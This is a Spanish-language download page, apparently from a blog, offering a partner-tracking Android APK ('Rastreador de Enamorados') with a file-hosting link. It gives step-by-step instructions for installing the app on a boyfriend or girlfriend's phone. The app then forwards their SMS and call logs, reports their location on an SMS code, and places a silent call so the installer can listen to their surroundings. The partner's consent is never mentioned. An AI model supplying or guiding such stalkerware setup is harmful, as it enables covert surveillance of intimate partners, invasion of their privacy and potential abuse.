Rastreador de Enamorados [Apk]

Rastreador de Enamorados [Apk]
Esta aplicación ya no se encuentra mas en el appstore, ahora les paso a explicar su utilización:

Antes de utilizar el rastreador, lea todas las instrucciones con cuidado.

1 – El perseguidor se debe instalar en el teléfono de su novio/a. La célular de su novio/a necesita tener el sistema Android.

2 – Descargar la aplicación directamente debajo del botón en su teléfono celular y la instalación con el archivo descargado.

3 – Abrir el apk y colocar el teléfono en el ?El teléfono (novia/o)? con el operador de cero y DDD.

4 – Si lo deseas, puedes cambiar los códigos de ubicación y la conexión, pero esto no es obligatorio.

5 – Seleccione las notificaciones que desea recibir en el campo ?Copia de seguridad de SMS?, ?Registro de llamadas?, ?Phone Off?, ?Modo Avión? y ?Sin servicio?.

6 – Listo! La aplicación está configurada, ahora puede cerrarla. con esto ya debe estar recibiendo las notificaciones que seleccionó.

7 – Para obtener la ubicación de su novio, envíe el teléfono a su teléfono móvil un SMS con el ?Código de la localización?, cuyo valor por defecto es 1234, pero es posible que haya cambiado en el paso 4. Se puede tomar un tiempo para conseguir la ubicación, ya que puede tomar el teléfono para conseguir encontrar las señales del satélite.

8 – Para recibir una llamada automática de su novio y de escuchar lo que sucede a su alrededor, envíe el teléfono a su teléfono móvil un SMS con el ?Código de conexión?, cuyo valor por defecto es 4321, pero es posible que haya cambiado en el paso 4 .
Rastreador de Enamorados [Apk]9 – El rastreador utiliza SMS para enviar mensajes comunes, por lo que es necesario que su novio tiene créditos en el móvil o un plan de SMS para el correcto funcionamiento de la aplicación. En el caso de los dispositivos con múltiples chips debe tener crédito en el número de chip 1.

Aca les dejo el link de descarga:
https://mega.co.nz/#!Vdt2XATL!HmtIgDApAQdxZCCC2FLnFXu5Du4c7GqhZLPH6Lx0J2w
Descargar Rastreador de Enamorados [Apk] Gratis

Deja un comentario

Email
Print